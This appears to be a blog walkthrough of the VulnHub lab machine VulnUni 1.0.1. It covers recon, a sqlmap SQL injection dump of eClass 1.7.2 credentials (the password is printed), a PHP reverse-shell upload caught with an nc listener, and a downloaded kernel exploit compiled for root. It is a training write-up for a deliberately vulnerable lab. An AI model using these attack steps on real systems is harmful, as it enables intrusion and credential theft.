VulnUni: 1.0.1 | walkthrough |writeup| vulnhub

Sagar Jain
5 min readApr 24, 2020



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Welcome to "Vuln Uni"!

This boot2root machine is realistic without any CTF elements and pretty straight forward.

Goal: Hack your University and get root access to the server.

To successfully complete the challenge you need to get user and root flags.

Difficulty: Easy / Beginner Level

Need hints? Twitter @emaragkos

DHCP is enabled

Your feedback is really valuable for me!

Was there something that you didn’t like about this VM?

Please let me know so that I can make more interesting challenges in the future.

Good luck and have fun :)

## Changelog v1.0.1 - 2020-03-20 v1.0 - 2020/03-19


lets find the ip address for machine with the tool named netdiscover

netdiscover -i vboxnet0

  • -i device: your network device
  • for the name of network use command ifconfig
network device name

So now lets Start with nmap scan

nmap -v -sCV -A -O -p-

80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni — We train the top Information Security Professionals

So here only one port is open, Lets Enumerate…

@port 80:

home page @port 80

lets visit full site manually and check the source code also,

found a comment in the source code of page courses saying to disable a page “vulnuni-eclass-platform.html” till the new version is installed.

source-code comment

lets visit the commented page manually


found a redirection to the login page

page not found due to the a-name record, as it redirects to the “vulnuni.local/vulnuni-eclass/index.php” ,

lets edit our hosts file

vim /etc/hosts

hosts file

lets try again

login page of eclass

here it is, I tried some default username and password like admin:admin, user:password but didn’t worked.

found the eclass current version installed, lets google for the vulnerabilities in eclass version 1.7.2 .

version 1.7.2

got vulnerability of Error based sqli on a particular parameter

vulnerability explaination @exploitdb 48106

lets use these parameters , as we don’t have any account so we will go for time-based blind injection as said in above exploit.

sqlmap -u “http://vulnuni.local/vulnuni-eclass/index.php" — dump -D eclass -T user -C username,password — form — crawl=2

final result of sqlmap

got login with admin privilages, with the extracted credential from mysql

admin : ilikecats89

login as admin

lets follow the another part of the same exploit to take reverse shell.

exploitdb 48106

lets follow and navigate to /modules/course_info/restore_course.php

lets compress our shell in a zip file

zip php-reverse-shell.php

upload the zip file and lets start a nc listener

nc -lvp 4455

now we just have to call the given location in the browser “/courses/tmpUnzipping/php-reverse-shell.php” and will get shell.

got shell

got shell as www-data and converted it into a stty shell.


Privilage Escalation:

didn’t get any thing intresting in the box else then the kernel version that is exploitable, I have downloaded the exploit which I found at github.

get it downloaded to the victims machine with the help of a python server

python -m SimpleHTTPServer 1234


lets compile the exploit and run the exploit

gcc exploit.c -o exploit -Wall -ldl -lpthread

chmod +x exploit



got ROOT


